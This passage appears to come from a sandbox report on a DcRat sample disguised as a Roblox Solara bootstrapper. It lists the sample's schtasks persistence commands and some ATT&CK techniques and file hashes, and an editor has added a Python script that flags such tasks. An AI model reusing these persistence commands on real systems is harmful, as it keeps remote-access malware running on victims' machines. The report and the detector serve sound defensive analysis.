  schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 3208)
  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 4364)
  schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\winNet\fontdrvhost.exe'" /f
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 2476)
  schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\winNet\fontdrvhost.exe'" /rl HIGHEST /f
  - DcRat
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 3516)
  schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\winNet\fontdrvhost.exe'" /rl HIGHEST /f
  - DcRat
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 4440)
  schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 9 /tr "'C:\winNet\Refcrt.exe'" /f
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 2404)
  schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\winNet\Refcrt.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 2944)
  schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 10 /tr "'C:\winNet\Refcrt.exe'" /rl HIGHEST /f
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 4468)
  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Documents\conhost.exe'" /f
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 2004)
  schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\All Users\Documents\conhost.exe'" /rl HIGHEST /f
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 1924)
  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Documents\conhost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 2756)
  schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 5 /tr "'C:\DriversavessessionDlldhcp\sysmon.exe'" /f
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 4660)
  schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\sysmon.exe'" /rl HIGHEST /f
  - DcRat
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 3536)
  schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 9 /tr "'C:\DriversavessessionDlldhcp\sysmon.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 1776)
  schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\Refcrt.exe'" /f
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 2264)
  schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Refcrt.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 3336)
  schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\Refcrt.exe'" /rl HIGHEST /f
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 4924)
  schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\AppData\Local\TrustedInstaller.exe'" /f
  - Process spawned unexpected child process
  - Loads dropped DLL

C:\Windows\system32\schtasks.exe (depth 1, PID 5124)
  schtasks.exe /create /tn "TrustedInstaller" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\TrustedInstaller.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Loads dropped DLL
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 4468)
  schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\AppData\Local\TrustedInstaller.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Loads dropped DLL

C:\Windows\system32\schtasks.exe (depth 1, PID 544)
  schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 12 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f
  - DcRat
  - Process spawned unexpected child process
  - Loads dropped DLL

C:\Windows\system32\schtasks.exe (depth 1, PID 6112)
  schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Loads dropped DLL
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 6036)
  schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Loads dropped DLL
C:\winNet\fontdrvhost.exeC:\winNet\fontdrvhost.exe1⤵PID:7140
-
C:\Users\Admin\AppData\Local\TrustedInstaller.exe"C:\Users\Admin\AppData\Local\TrustedInstaller.exe"2⤵PID:5052
-
-
C:\winNet\fontdrvhost.exe.exe"C:\winNet\fontdrvhost.exe.exe"2⤵PID:6456
-
-
C:\Users\Admin\Music\xdwdAdobe Illustrator.exe"C:\Users\Admin\Music\xdwdAdobe Illustrator.exe"1⤵PID:3080
-
C:\Users\Default\Pictures\Registry.exeC:\Users\Default\Pictures\Registry.exe1⤵PID:6668
-
C:\Users\Default\Pictures\Registry.exe.exe"C:\Users\Default\Pictures\Registry.exe.exe"2⤵PID:5552
-
-
C:\Users\Admin\AppData\Local\TrustedInstaller.exe"C:\Users\Admin\AppData\Local\TrustedInstaller.exe"2⤵PID:2812
-
-
C:\Recovery\WindowsRE\backgroundTaskHost.exeC:\Recovery\WindowsRE\backgroundTaskHost.exe1⤵PID:2648
-
C:\Users\Admin\AppData\Local\TrustedInstaller.exe"C:\Users\Admin\AppData\Local\TrustedInstaller.exe"2⤵PID:5040
-
-
C:\Recovery\WindowsRE\backgroundTaskHost.exe.exe"C:\Recovery\WindowsRE\backgroundTaskHost.exe.exe"2⤵PID:5652
-
-
C:\Users\Admin\AppData\Local\TrustedInstaller.exeC:\Users\Admin\AppData\Local\TrustedInstaller.exe1⤵PID:2880
-
C:\Program Files\Uninstall Information\SolaraBootstrapper.exe"C:\Program Files\Uninstall Information\SolaraBootstrapper.exe"1⤵PID:6720
-
C:\Program Files\Uninstall Information\SolaraBootstrapper.exe.exe"C:\Program Files\Uninstall Information\SolaraBootstrapper.exe.exe"2⤵PID:6464
-
-
C:\Users\Admin\AppData\Local\TrustedInstaller.exe"C:\Users\Admin\AppData\Local\TrustedInstaller.exe"2⤵PID:1100
-
-
C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe"C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe"1⤵PID:7068
-
C:\Users\Admin\AppData\Local\TrustedInstaller.exe"C:\Users\Admin\AppData\Local\TrustedInstaller.exe"2⤵PID:2728
-
-
C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe.exe"C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe.exe"2⤵PID:7164
-
-
C:\Windows\Vss\Writers\Application\WmiPrvSE.exeC:\Windows\Vss\Writers\Application\WmiPrvSE.exe1⤵PID:6628
-
C:\Recovery\WindowsRE\Refcrt.exeC:\Recovery\WindowsRE\Refcrt.exe1⤵PID:2260
-
C:\DriversavessessionDlldhcp\cmd.exeC:\DriversavessessionDlldhcp\cmd.exe1⤵PID:5304
-
C:\Recovery\WindowsRE\csrss.exeC:\Recovery\WindowsRE\csrss.exe1⤵PID:3316
-
C:\DriversavessessionDlldhcp\sysmon.exeC:\DriversavessessionDlldhcp\sysmon.exe1⤵PID:688
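The schtasks rows above are the whole persistence layer the sandbox caught: for each dropped binary there is one task that fires at logon (/sc ONLOGON, usually /rl HIGHEST) and a second, with a suffixed name, that relaunches the same binary every few minutes (/sc MINUTE /mo N), all created with /f so an existing task of that name is silently replaced, and all under names borrowed from real Windows or Sysinternals processes (conhost, sysmon, csrss, smss, WmiPrvSE, TrustedInstaller) living outside the directories those binaries belong in. The script below is an added example by the editor, not the sandbox's own detection logic and not code from the sample: it parses command lines of that shape, tags each task with the traits just listed, and adds the cross-task signal (an ONLOGON and a MINUTE task pointing at one binary). Its input is five rows copied from this report plus one constructed benign control; the lookalike-name list, directory prefixes and 15-minute threshold are the editor's assumptions.

```python
"""Tag `schtasks /create` command lines with the persistence traits seen in this report.
Added example by the editor, not code from the sandbox report, the DcRat family or the
Solara sample. The lookalike-name list, directory lists and the 15-minute heartbeat
threshold are assumptions to tune against your own baseline.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Assumption: Windows/Sysinternals process names the sample borrows for tasks and binaries.
LOOKALIKE_NAMES = {"conhost", "csrss", "smss", "sysmon", "wmiprvse", "fontdrvhost", "cmd",
                   "trustedinstaller", "backgroundtaskhost", "registry", "svchost", "lsass"}
# Where a binary with one of those names legitimately lives (lower-case path prefixes).
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\servicing\\")
# Top-level directories of a stock install; "DriversavessessionDlldhcp" and "winNet" are not.
STANDARD_ROOT_DIRS = {"windows", "users", "programdata", "recovery", "perflogs",
                      "program files", "program files (x86)"}
HEARTBEAT_MINUTES_MAX = 15  # assumption: /sc MINUTE /mo <= 15 is a beacon-style heartbeat
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')  # keeps a double-quoted run as one token
EXE_RE = re.compile(r"^(.*?\.exe)(?=\s|$)", re.IGNORECASE)


@dataclass
class TaskCreate:
    name: str
    schedule: str              # /sc, upper-cased
    modifier: Optional[str]    # /mo, if present
    target: str                # /tr with the surrounding quotes removed
    exe: str                   # executable path extracted from target
    run_level: Optional[str]   # /rl, upper-cased
    force: bool                # /f present
    tags: List[str] = field(default_factory=list)


def parse_schtasks_create(cmdline: str) -> Optional[TaskCreate]:
    """Return a TaskCreate for a `schtasks /create` line, or None for anything else."""
    toks = [q if q else bare for q, bare in TOKEN_RE.findall(cmdline)]
    lowered = [t.lower() for t in toks]
    if not toks or "schtasks" not in lowered[0] or "/create" not in lowered:
        return None
    opts: Dict[str, object] = {}
    i = 1
    while i < len(toks):  # a switch followed by a non-switch token takes it as its value
        has_value = i + 1 < len(toks) and not lowered[i + 1].startswith("/")
        opts[lowered[i]] = toks[i + 1] if has_value else True
        i += 2 if has_value else 1
    name, sched, target, mo, rl = (opts.get(k) for k in ("/tn", "/sc", "/tr", "/mo", "/rl"))
    if not (isinstance(name, str) and isinstance(sched, str) and isinstance(target, str)):
        return None
    target = target.strip().strip("'\"")
    m = EXE_RE.match(target)
    return TaskCreate(name, sched.upper(), mo if isinstance(mo, str) else None, target,
                      m.group(1) if m else target.split(" ", 1)[0],
                      rl.upper() if isinstance(rl, str) else None, opts.get("/f") is True)


def assess(task: TaskCreate) -> TaskCreate:
    """Tag one task with the per-task traits it carries."""
    exe = task.exe.lower()
    parts = exe.split("\\")
    stem = parts[-1][:-4] if parts[-1].endswith(".exe") else parts[-1]
    root = parts[1] if len(parts) > 2 and parts[0].endswith(":") else ""
    if stem in LOOKALIKE_NAMES and not exe.startswith(TRUSTED_DIRS):
        task.tags.append("lookalike_untrusted_path")
    if root and root not in STANDARD_ROOT_DIRS:
        task.tags.append("nonstandard_root_dir")
    if task.run_level == "HIGHEST":
        task.tags.append("run_level_highest")
    if task.schedule == "ONLOGON":
        task.tags.append("onlogon")
    if task.schedule == "MINUTE" and (task.modifier or "").isdigit() \
            and int(task.modifier) <= HEARTBEAT_MINUTES_MAX:
        task.tags.append("short_heartbeat")
    if task.force:
        task.tags.append("force_overwrite")
    return task


def triage(cmdlines: List[str]) -> List[TaskCreate]:
    """Parse and tag every line, then add the cross-task signal the report shows:
    an ONLOGON task and a MINUTE task that both launch the same binary."""
    tasks = [assess(t) for t in map(parse_schtasks_create, cmdlines) if t is not None]
    by_exe: Dict[str, List[TaskCreate]] = {}
    for t in tasks:
        by_exe.setdefault(t.exe.lower(), []).append(t)
    for group in by_exe.values():
        if {"ONLOGON", "MINUTE"} <= {t.schedule for t in group}:
            for t in group:
                t.tags.append("onlogon_plus_heartbeat_pair")
    return sorted(tasks, key=lambda t: (-len(t.tags), t.name.lower()))


SAMPLE_CMDLINES = [  # the first five are copied from the schtasks.exe rows of the process tree
    r'''schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\All Users\Documents\conhost.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Documents\conhost.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 5 /tr "'C:\DriversavessessionDlldhcp\sysmon.exe'" /f''',
    r'''schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\sysmon.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Refcrt.exe'" /rl HIGHEST /f''',
    # Constructed benign control, not from the report: real binary, trusted path, no /rl, no /f.
    r'''schtasks.exe /create /tn "Nightly defrag" /sc DAILY /st 02:00 /tr "C:\Windows\System32\defrag.exe C: /O"''',
]
```

Calling `triage(SAMPLE_CMDLINES)` ranks the two sysmon tasks and the conhost pair at the top, Refcrt (a non-lookalike name, but ONLOGON plus HIGHEST plus /f) in the middle, and the defrag control with no tags at all. The command lines come from wherever you collect process creation on the host (Sysmon event ID 1, or Security event 4698 for the task itself). Two caveats when reading the tags: /rl HIGHEST only means the task runs with the highest privileges the creating account already holds, so it is a signal of intent, not proof of elevation; and the MINUTE heartbeat is what makes removal awkward, because killing the process and deleting one task leaves the other to bring it back within minutes, so both tasks of each pair have to go together.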
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Event Triggered Execution (1)
  - AppInit DLLs (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Event Triggered Execution (1)
  - AppInit DLLs (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Downloads
-
Filesize
239B
MD53492e48fb2e9fb2bfc18658e3d8f88bd
SHA134cec8222aedc8baf774aa863a041a23971c7631
SHA256c0857f8c479b8fa90402a735a24b312819cdcec5c69b90bd6dafc175dbfd3b2e
SHA512a9923e942d86d3e29a52d421ceb96c8cef8aae769cbb18a65e93793e444cf7712c52aaba3a5da2f06d2ee5c3eef42d6972457b13aa06a060eaf9b26369d0efc9
-
Filesize
1.6MB
MD5e41ef428aaa4841f258a38dc1cc305ef
SHA1edf3a17831e013b74479e2e635b8cf0c1b3787ce
SHA2566c02076f8f42678e0576a71ff170ed84b203a0e5e9a31bda9aed912822f25995
SHA512a92a30077601aaf34a05ceaab5738ad2aa585498868bb6b675dd43d332c46424c859ed19cf0159b04fcf7b4da3b773e37ca064e8975a43964cc6a654661f46bd
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
226B
MD528d7fcc2b910da5e67ebb99451a5f598
SHA1a5bf77a53eda1208f4f37d09d82da0b9915a6747
SHA2562391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c
SHA5122d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6
-
Filesize
944B
MD559d97011e091004eaffb9816aa0b9abd
SHA11602a56b01dd4b7c577ca27d3117e4bcc1aa657b
SHA25618f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
SHA512d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
944B
MD5e448fe0d240184c6597a31d3be2ced58
SHA1372b8d8c19246d3e38cd3ba123cc0f56070f03cd
SHA256c660f0db85a1e7f0f68db19868979bf50bd541531babf77a701e1b1ce5e6a391
SHA5120b7f7eae7700d32b18eee3677cb7f89b46ace717fa7e6b501d6c47d54f15dff7e12b49f5a7d36a6ffe4c16165c7d55162db4f3621db545b6af638035752beab4
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
MD5d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
944B
MD5e243a38635ff9a06c87c2a61a2200656
SHA1ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc
SHA256af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f
SHA5124418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4
-
Filesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize
944B
MD53a6bad9528f8e23fb5c77fbd81fa28e8
SHA1f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2
-
Filesize
944B
MD53f038ac2e2ceadad0f78317ea7de6881
SHA1f2ee66d1ab22d5594426a26e9d2628ce29b037a7
SHA256475591875182108710538a2ea21a89e0ffa1df43f776689288e0fa96da46efb7
SHA512f751f1f06b79550af211a9bf39d59712bb60f4e2c79a24d850970b1d40e871c2e53ce84ed4f5d974dad53cdbfb95d38a8eff9f871f22ae2d3e772deb731715f4
-
Filesize
944B
MD56019bc03fe1dc3367a67c76d08b55399
SHA13d0b6d4d99b6b8e49829a3992072c3d9df7ad672
SHA2567f88db7b83b11cd8ea233efc3a1498635b68771482658255750df564a065f7d0
SHA5126b5409780a23e977b0bbe463e351f1d474539100aeaa01b0b7fe72aa6dbfb3c0fec64fe9db65b63d188a279b65eae7f31ef0b6880c67ada9ab175da419f595eb
-
Filesize
20KB
MD5a603e09d617fea7517059b4924b1df93
SHA131d66e1496e0229c6a312f8be05da3f813b3fa9e
SHA256ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7
SHA512eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc
-
Filesize
2.2MB
MD57529e4004c0fe742df146464e6aeadb0
SHA1ae7341ee066b31de5a1a1a25851b70ced41de13f
SHA256a80a68f1b63391ba9a91870173a0db962c73950c191594750e705f1d1c77be81
SHA512d50112143b1a2acf918606e2f0a1d01fc2d5ed3e2e4ecdcdb2405669af2444a3274c7e39461c723d675e230f8cb72be351cdb1b8e31b9f5b5517a03c66f47f27
-
Filesize
1.9MB
MD57d4b84a8c3d14cb3d1bb864719463404
SHA1544cf51aec717c63552f0fdf97d364b1b62a7a0c
SHA2563aa0597b5d053594cce551ac5d8a9bc83059c3d55ef024dc7dff59c73a88e663
SHA512d962cbe9998d2e04a9bbd2ab1a97535409015b183acc0d61d49f6b696eac046e7c41028b55c8d33c3b6c1dacbf3704771dbdf911b06c8e9c247b49d2c6864a29
-
Filesize
2.1MB
MD511fdce42422f8ed518fedf290f5bfc3c
SHA1f18a4ad694af5ba50a7697b4cb66308454c555d9
SHA256b62b6592549d56b573efdd053c73e37542742301fffbeb786a60c227564b97a3
SHA5124e1c700ed33db9b29fe3545efeb7616ccf9c86b0716ee684d5375097651b44b3aab99302e6e159bb3f088b4cb59334aa473864d3d8b43a583b3cbfd9a12d16ae
-
Filesize
40KB
MD5a182561a527f929489bf4b8f74f65cd7
SHA18cd6866594759711ea1836e86a5b7ca64ee8911f
SHA25642aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA5129bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
2.6MB
MD5170b43350048ed4b6fca0e50a0178621
SHA1db863b7b04a7c58baa9120e2f184517ed27a7252
SHA256248856f33f34ee7f97fd2a83264d4c85251f06bce6d5761d416405a33849079b
SHA512e8dc07cf863d01e5ae18b44432cbf3ae54cd24f12d00981a5b5df51684039783339f7b43f79816d25790210654b3da17eae4687f2a3b34b6e2570c5ce990bde7
-
Filesize
797KB
MD536b62ba7d1b5e149a2c297f11e0417ee
SHA1ce1b828476274375e632542c4842a6b002955603
SHA2568353c5ace62fda6aba330fb3396e4aab11d7e0476f815666bd96a978724b9e0c
SHA512fddec44631e7a800abf232648bbf417969cd5cc650f32c17b0cdc12a0a2afeb9a5dbf5c1f899bd2fa496bd22307bfc8d1237c94920fceafd84f47e13a6b98b94
-
Filesize
8.7MB
MD5d25ebdfc04bdadea74017fa72f90781f
SHA1f7278c4d04fc4db888368e0245d7607d8bcbb557
SHA2569f30de67eacb0138506eff3c67dc9c52b0e923416dc75722ac90b12210b5383f
SHA51277cca4e741a6f96cc35a3ce55c3f899f902719c8ee29c84a6f5dcb57e9d6b8f85cad2042486ff907046f3c87673f5a34da73730256822d090ae764ba21064e71
-
Filesize
192B
MD5844984ebf0448679b26b60f184d93a68
SHA100254004f97ae60f365074ee756aaf207575b372
SHA256803a36c6f3a87f3d136f3958c64f1b258ed9ee4c9f31a23d19b6992ae815c78a
SHA512c67b3bee66a08ff5de42b7ec415ce919231212c94a830c0e11924c32ef022aba8ea2a0daf730eb0c112f73d8611bd4424657b896df8d495c8b47d3acb9d8342d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
485KB
MD5414b2c1de3b01b9f2cb8a3921f0cbd1f
SHA19eb52184bf86a64efb713d65927eb03052869abc
SHA256185bcd14ce4b5531c75d57d2dc996cf6e69d46121a1cd83b6ffb746ccd36938f
SHA512b47b105ece11cbc660c3a61ac1f7012fcbbaee77610ab4f4937111d224d8f6d8682bda720e0ee488c2deca5f0d8ed3a46c000eb9479c864f349758beaeeb7859
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
114KB
MD520698b0aeafa51b961cd383ef3f99ccb
SHA1a81cf3b3e1da80e1a99faf0cc47e6f93087b755c
SHA2569e58a7cfc4125c430dc8aa17d4aaeac7646efc556bb26f859559b957f68240dd
SHA51285bf507f86a743343141d0654ab47db8ccf1674de25e742be7c5f3925befcaac917b5e65d8b9a9272de05c250dd442e0b1bcdae68947c7e418adebde9f2e37fe
-
Filesize
30.1MB
MD50e4e9aa41d24221b29b19ba96c1a64d0
SHA1231ade3d5a586c0eb4441c8dbfe9007dc26b2872
SHA2565bfb6f3ab89e198539408f7e0e8ec0b0bd5efe8898573ec05b381228efb45a5d
SHA512e6f27aecead72dffecbeaad46ebdf4b1fd3dbcddd1f6076ba183b654e4e32d30f7af1236bf2e04459186e993356fe2041840671be73612c8afed985c2c608913
-
Filesize
1.8MB
MD51797c0e37f4b9dd408cbf0d7bfcb7c95
SHA110df695351ac6074e23a3d3b4bd31a17c10fd614
SHA2568a1b256aa65d666d8b566576c86065bb9401483f705bce0c597fc27b9cde2cfb
SHA51252289cb15c7b2c5a600da9e9894f5dbc66566eff9c864488dfd8d318800fbbf8622a3dad79f7f5aec6d77badfc0707010ffffe521eef8f218be33e07092010b1
-
Filesize
1.8MB
MD526e388ea32df635cd424decb2bff563e
SHA1510ac8024dd524f7ebc92210b189804921fd29ee
SHA256cf90b0e7318a9e4e3cbaeebd3f82f823e7754a35e689979fabd18e785383dc8e
SHA512b59ecb856064e3d590ec3d0f17410195bf08cd6a2b0bb091c92c9200c3e163f5b0e918b09f7ff0f51990dae49ba27ea566862353647ee59ae9ea9c192faf79d1
-
Filesize
32KB
MD5c1a4a4340b4aaf6b72487d4d011fdee9
SHA1c1a25eeeb340d226fa996fd8b6e9559d3112b4c5
SHA256858259d792411041f71a344c219b120bd494de51529259dac6846ae8e7e9bc19
SHA51276316cb27ac8729ab8f972229c25e521213295c2a6b21b073cb9b258b056e85facd86754abbf1a7e89b7516a1a184b6826a078ddb56f4c9bb2de5c3844929f37
-
Filesize
46B
MD583a7f739f51f1acd83f143afa6ec1533
SHA12f653f906842f8f507d02f81550eb26a35f38acc
SHA2565faae2c746c71afcb3dc0b9eb4fbf6087786936484f62ee08412a94c13642545
SHA512c4487c0ca0e630ee8daf2443c290fac2d0de60b0ce36c28e6451cfd66b2b81669a87726da31d4e172d2794a0345bbe9111402486b6e28d941fb6d124be604793
-
Filesize
1.5MB
MD59cf4017a8383ae846a908c79a28354bf
SHA1adbe6a02b90147431e80fc38100de42d88dd765a
SHA256bc7ea8011a8098690cf8976f14533fdbd5a0532818ed30365ef5412a256516f2
SHA512490a19bdd35657a50e72f2c133c8d731cf1cccd14dc4ce9648d22f486540edd9f7448eb4d2840d52bd7601c52036572937b4c79bc32206eb98b7dc76765d1f00
-
Filesize
221B
MD51a3448b944b91cebda73adc5064e6286
SHA14f8716c6e56a675944a5f0f250947c8d45a362e1
SHA2565b489dab912970289bd0bfb41928010990288e7a3ec8acb18f637e670c50e0e5
SHA512b355ffb98b0744cc6a1baaff7645c862344b12cfc251a1a243da666f7d41f8eea8b6a179faaeb600ffd4b4ce51b8c3f942c0cc6bd06875a4b80440468ce63795
-
Filesize
122KB
MD59fe9b0ecaea0324ad99036a91db03ebb
SHA1144068c64ec06fc08eadfcca0a014a44b95bb908
SHA256e2cce64916e405976a1d0c522b44527d12b1cba19de25da62121cf5f41d184c9
SHA512906641a73d69a841218ae90b83714a05af3537eec8ad1d761f58ac365cf005bdd74ad88f71c4437aaa126ac74fa46bcad424d17c746ab197eec2caa1bd838176
-
Filesize
211KB
MD5a3ae5d86ecf38db9427359ea37a5f646
